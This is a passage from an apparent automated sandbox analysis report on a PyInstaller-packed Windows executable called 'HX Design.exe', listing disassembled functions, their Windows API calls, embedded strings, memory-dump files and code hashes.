U, xrefs: 00007FF73207CCFB

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
Instruction ID: c988a1df6911ca3dc0b333fb9211893b91e4159cc8f7deeba8f837b968dc4f28
Opcode Fuzzy Hash: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
Instruction Fuzzy Hash: F741F532B18A8191EB60EF29E4443BAA7A0FB88784FC04131EE4D87B98EF7CD405D750

Function 00007FF73207F5B8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32 ref: 00007FF73207F5F8
GetCurrentDirectoryW.KERNEL32 ref: 00007FF73207F64A

Strings

:, xrefs: 00007FF73207F60E

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID: CurrentDirectory
String ID: :
API String ID: 1611563598-336475711
Opcode ID: 9aa1b1c0966d0181e71a7442aa19fd9d8a3a06258be719e39fc35e3b215e25b0
Instruction ID: 79cdbe61eb4637508e46f815839cba5eab8251c58c5db154b79e27c57ffdf7f8
Opcode Fuzzy Hash: 9aa1b1c0966d0181e71a7442aa19fd9d8a3a06258be719e39fc35e3b215e25b0
Instruction Fuzzy Hash: 03212B72B1828191EB20BB19D44827EB3B1FBC4B84FC54035DA5D43695DFBCD548DB60

Function 00007FF73206FD48 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32 ref: 00007FF73206FD98
RaiseException.KERNEL32 ref: 00007FF73206FDD9

Strings

csm, xrefs: 00007FF73206FDC6

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
Instruction ID: 0827a57cd214d5d603c9843579ba64e3507f40d2e1e167af68632560fe601457
Opcode Fuzzy Hash: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
Instruction Fuzzy Hash: 0C116D32608B8192EB219F15F40426AB7E5FB88B98F984230EF8D07768DF7CD555CB00

Function 00007FF73208073C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF73208076C
GetDriveTypeW.KERNEL32 ref: 00007FF7320807AC

Strings

:, xrefs: 00007FF732080795

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID: DriveType_invalid_parameter_noinfo
String ID: :
API String ID: 2595371189-336475711
Opcode ID: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
Instruction ID: 7d7887c1f5e57843612841c26cdfcad197fa124ac1919c008f8ab5197126098e
Opcode Fuzzy Hash: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
Instruction Fuzzy Hash: 5301A721D1C30395F720BF64946527FA3A0EF44744FC00036D54D46691EFBCD548EB24

Analysis Process: HX Design.exePID: 7524, Parent PID: 7508COMMON

Execution Graph

Execution Coverage:	1.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	1.2%
Total number of Nodes:	822
Total number of Limit Nodes:	32

Executed Functions

Function 00007FF732061000 Relevance: 61.8, APIs: 7, Strings: 28, Instructions: 511
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Failed to unpack splash screen dependencies from PKG archive!, xrefs: 00007FF732063EA6
_PYI_SPLASH_IPC, xrefs: 00007FF732063A23, 00007FF732063EF5
pkg, xrefs: 00007FF7320639BE
_PYI_PARENT_PROCESS_LEVEL, xrefs: 00007FF732063A17, 00007FF732063A2F, 00007FF732063A9B
Path exceeds PYI_PATH_MAX limit., xrefs: 00007FF732063D12
pyi-contents-directory, xrefs: 00007FF732063B8D
Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s, xrefs: 00007FF732063B32
Failed to remove temporary directory: %s, xrefs: 00007FF732063FCF
Failed to initialize security descriptor for temporary directory!, xrefs: 00007FF732063C61
pyi-disable-windowed-traceback, xrefs: 00007FF732063BB2
Py_GIL_DISABLED, xrefs: 00007FF732063AF4
Failed to start splash screen!, xrefs: 00007FF732063ED4
_PYI_APPLICATION_HOME_DIR not set for onefile child process!, xrefs: 00007FF732063D35
Failed to convert DLL search path!, xrefs: 00007FF732063DDC
Could not create temporary directory!, xrefs: 00007FF732063CBF
PYINSTALLER_SUPPRESS_SPLASH_SCREEN, xrefs: 00007FF732063E0A
_PYI_APPLICATION_HOME_DIR, xrefs: 00007FF732063A0B, 00007FF732063CD4, 00007FF732063F6B
Could not side-load PyInstaller's PKG archive from external file (%s), xrefs: 00007FF7320639DE
PYINSTALLER_STRICT_UNPACK_MODE, xrefs: 00007FF732063BE8
pyi-python-flag, xrefs: 00007FF732063AD6
Failed to load Tcl/Tk shared libraries for splash screen!, xrefs: 00007FF732063EBB
MEI, xrefs: 00007FF732063933
VCRUNTIME140.dll, xrefs: 00007FF732063DB1
_PYI_ARCHIVE_FILE, xrefs: 00007FF7320638D2, 00007FF7320639FF
Could not load PyInstaller's embedded PKG archive from the executable (%s), xrefs: 00007FF732063971
Failed to load splash screen resources!, xrefs: 00007FF732063E85
pyi-runtime-tmpdir, xrefs: 00007FF732063B68
PYINSTALLER_RESET_ENVIRONMENT, xrefs: 00007FF732063882, 00007FF7320638AF

Memory Dump Source

Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd

Similarity

API ID: ErrorFileLastModuleName
String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag$pyi-runtime-tmpdir
API String ID: 2776309574-4232158417
Opcode ID: d52c1960cc45de78c26c9f57622ace5a14626686e839aa839f1fc42fe00fc1f1
Instruction ID: 8f7f528829b4290758f5c6021b6df81c97e115fe6210bf7ae367767ce32e76d3
Opcode Fuzzy Hash: d52c1960cc45de78c26c9f57622ace5a14626686e839aa839f1fc42fe00fc1f1
Instruction Fuzzy Hash: 5D32AB21B08682B5FB18BB3494553BAE6A1EF45B80FC44032DA5D432D6EFACE55CE374

Function 00007FFE00311A0F Relevance: 23.6, APIs: 5, Strings: 8, Instructions: 858COMMON

Download Yara Rule

Strings

POST , xrefs: 00007FFE0035B90B
ssl3_get_record, xrefs: 00007FFE0035ACF1, 00007FFE0035AEA0, 00007FFE0035B016, 00007FFE0035B064, 00007FFE0035B094, 00007FFE0035B0BC, 00007FFE0035B0E9, 00007FFE0035B196, 00007FFE0035B1DF, 00007FFE0035B324, 00007FFE0035B34C, 00007FFE0035B3B8, 00007FFE0035B439, 00007FFE0035B593, 00007FFE0035B743, 00007FFE0035B7C2, 00007FFE0035B7EF, 00007FFE0035B821, 00007FFE0035B855, 00007FFE0035B887, 00007FFE0035B973, 00007FFE0035B9AD, 00007FFE0035BA20, 00007FFE0035BA51
CONNE, xrefs: 00007FFE0035B95A
PUT , xrefs: 00007FFE0035B943
HEAD , xrefs: 00007FFE0035B929
GET , xrefs: 00007FFE0035B8E8
..\s\ssl\record\ssl3_record.c, xrefs: 00007FFE0035ACF8, 00007FFE0035AEA7, 00007FFE0035B01D, 00007FFE0035B06B, 00007FFE0035B09B, 00007FFE0035B0C8, 00007FFE0035B0F5, 00007FFE0035B1A2, 00007FFE0035B1EB, 00007FFE0035B330, 00007FFE0035B358, 00007FFE0035B38F, 00007FFE0035B3C4, 00007FFE0035B445, 00007FFE0035B489, 00007FFE0035B4AB, 00007FFE0035B74F, 00007FFE0035B7CE, 00007FFE0035B7FB, 00007FFE0035B828, 00007FFE0035B861, 00007FFE0035B88E, 00007FFE0035B97F, 00007FFE0035B9B9, 00007FFE0035BA27, 00007FFE0035BA5D
, xrefs: 00007FFE0035B187

Memory Dump Source

Source File: 00000001.00000002.2108169054.00007FFE00311000.00000040.00000001.01000000.00000011.sdmp, Offset: 00007FFE00310000, based on PE: true

Associated: 00000001.00000002.2108120113.00007FFE00310000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE00393000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE00395000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE003BD000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE003C8000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE003D3000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108509138.00007FFE003D7000.00000080.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108558516.00007FFE003D9000.00000004.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe00310000_HX Design.jbxd

Similarity

API ID:
String ID: $..\s\ssl\record\ssl3_record.c$CONNE$GET $HEAD $POST $PUT $ssl3_get_record
API String ID: 0-2781224710
Opcode ID: b400293baa34000780f5a339118ca863fb8810f07702305baec27cbd6e082666
Instruction ID: f92e3187595c664bf5e741c52d637cb91773cce29525b52e429cb979d1260b06
Opcode Fuzzy Hash: b400293baa34000780f5a339118ca863fb8810f07702305baec27cbd6e082666
Instruction Fuzzy Hash: 37829D21A08A8281FB629B21D4547BEA7A1EF86785F544036DB4D47BFEDF3CE581C311

Function 00007FFDFB2F92B0 Relevance: 14.5, APIs: 5, Strings: 3, Instructions: 513
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB2F937F
00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB2F945E
00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB2F9480
00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB2F963E
00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB2F9667

Strings

-journal, xrefs: 00007FFDFB2F9646
nolock, xrefs: 00007FFDFB2F97C5
immutable, xrefs: 00007FFDFB2F97FD

Memory Dump Source

Source File: 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB2E0000, based on PE: true

Associated: 00000001.00000002.2106328881.00007FFDFB2E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB441000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB443000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB458000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106684657.00007FFDFB45A000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106731063.00007FFDFB45C000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb2e0000_HX Design.jbxd

Similarity

API ID: 00007A463010
String ID: -journal$immutable$nolock
API String ID: 4225454184-4201244970
Opcode ID: a1f561667bbe6322790191b89becdf0bea67dc52a5ba2455568e19f1d4293569
Instruction ID: 8d381b69deac3cdf89acc5ca1947a81b06f414ea14b30d98fd1cb5f1c99ccf0f
Opcode Fuzzy Hash: a1f561667bbe6322790191b89becdf0bea67dc52a5ba2455568e19f1d4293569
Instruction Fuzzy Hash: BA326B22B0A683C6EB659F25D560BB93BA1FB45B98F044234CA6E477ECDF3CE5558300

Function 00007FF732085C00 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 334
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_get_daylight.LIBCMT ref: 00007FF732085C45

Part of subcall function 00007FF732085598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7320855AC

Part of subcall function 00007FF73207A948: HeapFree.KERNEL32(?,?,?,00007FF732082D22,?,?,?,00007FF732082D5F,?,?,00000000,00007FF732083225,?,?,?,00007FF732083157), ref: 00007FF73207A95E
Part of subcall function 00007FF73207A948: GetLastError.KERNEL32(?,?,?,00007FF732082D22,?,?,?,00007FF732082D5F,?,?,00000000,00007FF732083225,?,?,?,00007FF732083157), ref: 00007FF73207A968

Part of subcall function 00007FF73207A900: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF73207A8DF,?,?,?,?,?,00007FF73207A7CA), ref: 00007FF73207A909
Part of subcall function 00007FF73207A900: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF73207A8DF,?,?,?,?,?,00007FF73207A7CA), ref: 00007FF73207A92E

_get_daylight.LIBCMT ref: 00007FF732085C34

Part of subcall function 00007FF7320855F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF73208560C

_get_daylight.LIBCMT ref: 00007FF732085EAA
_get_daylight.LIBCMT ref: 00007FF732085EBB
_get_daylight.LIBCMT ref: 00007FF732085ECC
GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF73208610C), ref: 00007FF732085EF3

Strings

Eastern Summer Time, xrefs: 00007FF732085FB1
Eastern Standard Time, xrefs: 00007FF732085F99

Memory Dump Source

Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
String ID: Eastern Standard Time$Eastern Summer Time
API String ID: 4070488512-239921721
Opcode ID: 677ea417f3249c8bdb60afb6413c0575e0f743ff33606516b420b369f71394b1
Instruction ID: 8afa3c6fb46f86bfbe3d2fda8b234fdb1bc88e3c05afed86e31a574ae7926d18
Opcode Fuzzy Hash: 677ea417f3249c8bdb60afb6413c0575e0f743ff33606516b420b369f71394b1
Instruction Fuzzy Hash: 54D1F632A0824266E720FF65D4911BAEB91FF84784FC54035DE0D47696DFBCE449E760

Function 00007FF732086964 Relevance: 13.8, APIs: 9, Instructions: 276
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF732086698: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7320866D9
Part of subcall function 00007FF732086698: _invalid_parameter_noinfo.LIBCMT ref: 00007FF732086757
Part of subcall function 00007FF732086698: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7320867A8

CreateFileW.KERNEL32 ref: 00007FF732086A6A
CreateFileW.KERNEL32 ref: 00007FF732086ABA
GetLastError.KERNEL32 ref: 00007FF732086AEA
GetFileType.KERNEL32 ref: 00007FF732086AFF
GetLastError.KERNEL32 ref: 00007FF732086B09
CloseHandle.KERNEL32 ref: 00007FF732086B3C
CloseHandle.KERNEL32 ref: 00007FF732086C9F
CreateFileW.KERNEL32 ref: 00007FF732086CD4
GetLastError.KERNEL32 ref: 00007FF732086CE3

Memory Dump Source

Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd

Similarity

API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
String ID:
API String ID: 1617910340-0
Opcode ID: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
Instruction ID: bb852ee9146f8da58719cd6dd1fd98c8801e4ce85c16be6e33d4027131075355
Opcode Fuzzy Hash: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
Instruction Fuzzy Hash: 7FC1DF32B28A4596EB10EFA9C4802BD7771F749BA8F810235DA2E9B7D4DF78D059D310

Function 00007FF732085E7C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 143
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_get_daylight.LIBCMT ref: 00007FF732085EAA

Part of subcall function 00007FF7320855F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF73208560C

_get_daylight.LIBCMT ref: 00007FF732085EBB

Part of subcall function 00007FF732085598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7320855AC

_get_daylight.LIBCMT ref: 00007FF732085ECC

Part of subcall function 00007FF7320855C8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7320855DC

Part of subcall function 00007FF73207A948: HeapFree.KERNEL32(?,?,?,00007FF732082D22,?,?,?,00007FF732082D5F,?,?,00000000,00007FF732083225,?,?,?,00007FF732083157), ref: 00007FF73207A95E
Part of subcall function 00007FF73207A948: GetLastError.KERNEL32(?,?,?,00007FF732082D22,?,?,?,00007FF732082D5F,?,?,00000000,00007FF732083225,?,?,?,00007FF732083157), ref: 00007FF73207A968

GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF73208610C), ref: 00007FF732085EF3

Strings

Eastern Summer Time, xrefs: 00007FF732085FB1
Eastern Standard Time, xrefs: 00007FF732085F99

Memory Dump Source

Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd

Similarity

API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
String ID: Eastern Standard Time$Eastern Summer Time
API String ID: 3458911817-239921721
Opcode ID: 179af59534a267e8b56f66eebf2dbf2058aebcf107c16e98e161f461d30bd41f
Instruction ID: ad0385f4b0f1b262279072445e17238f0daa9bbdaece61cdeeaa393386809975
Opcode Fuzzy Hash: 179af59534a267e8b56f66eebf2dbf2058aebcf107c16e98e161f461d30bd41f
Instruction Fuzzy Hash: 2851B532A08642A6E750FF31D8815BAF761FB88784FC14135EA4D47696DFBCE409E760

Function 00007FFDFB2A9060 Relevance: 9.6, APIs: 4, Strings: 1, Instructions: 850librarymemoryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FFDFB2A9B20
GetProcAddress.KERNEL32 ref: 00007FFDFB2A9B4A
VirtualProtect.KERNEL32(?,?,?,00000000), ref: 00007FFDFB2A9BD4
VirtualProtect.KERNEL32 ref: 00007FFDFB2A9BF2

Strings

)tP, xrefs: 00007FFDFB2A908B

Memory Dump Source

Source File: 00000001.00000002.2106227546.00007FFDFB2A9000.00000080.00000001.01000000.00000010.sdmp, Offset: 00007FFDFADA0000, based on PE: true

Associated: 00000001.00000002.2104707036.00007FFDFADA0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2104758778.00007FFDFADA1000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2104758778.00007FFDFADB2000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2104758778.00007FFDFADC2000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2104758778.00007FFDFADC8000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2104758778.00007FFDFAE12000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2104758778.00007FFDFAE27000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2104758778.00007FFDFAE37000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2104758778.00007FFDFAE3E000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2104758778.00007FFDFAE4C000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2104758778.00007FFDFB02E000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2104758778.00007FFDFB119000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2104758778.00007FFDFB11B000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2104758778.00007FFDFB152000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2104758778.00007FFDFB18F000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2104758778.00007FFDFB1EA000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2104758778.00007FFDFB25B000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2104758778.00007FFDFB290000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2104758778.00007FFDFB2A3000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2106274168.00007FFDFB2AA000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfada0000_HX Design.jbxd

Similarity

API ID: ProtectVirtual$AddressLibraryLoadProc
String ID: )tP
API String ID: 3300690313-3907340667
Opcode ID: eab163715ab1799b633ac6e81f81b77985ed928b0291ff377fca493afee617fe
Instruction ID: e7a7d8d55b78ea5ec4357bdc385f5db5435c1d1a68c496e141b06242a9a16ccf
Opcode Fuzzy Hash: eab163715ab1799b633ac6e81f81b77985ed928b0291ff377fca493afee617fe
Instruction Fuzzy Hash: C062572272819296E719CF39D4106BD77A4F748785F045532EBAECB7D8EA3CEA45CB00

Function 00007FFDFBAB33C0 Relevance: 6.9, APIs: 4, Instructions: 900librarymemoryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FFDFBAB3EE9
GetProcAddress.KERNEL32 ref: 00007FFDFBAB3F13
VirtualProtect.KERNEL32(?,?,?,00000000), ref: 00007FFDFBAB3F9D
VirtualProtect.KERNEL32 ref: 00007FFDFBAB3FBB

Memory Dump Source

Source File: 00000001.00000002.2108018555.00007FFDFBAB3000.00000080.00000001.01000000.00000005.sdmp, Offset: 00007FFDFB460000, based on PE: true

Associated: 00000001.00000002.2106780302.00007FFDFB460000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2106827061.00007FFDFB461000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2106827061.00007FFDFB736000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2106827061.00007FFDFB745000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2106827061.00007FFDFB74F000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2106827061.00007FFDFB791000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2106827061.00007FFDFB860000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2106827061.00007FFDFB868000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2106827061.00007FFDFB96B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2106827061.00007FFDFB96F000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2106827061.00007FFDFB9B6000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2106827061.00007FFDFB9BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2106827061.00007FFDFB9FF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2106827061.00007FFDFBA33000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2106827061.00007FFDFBA5D000.00000040.00000001.01000000.00000005.sdmpDownload File
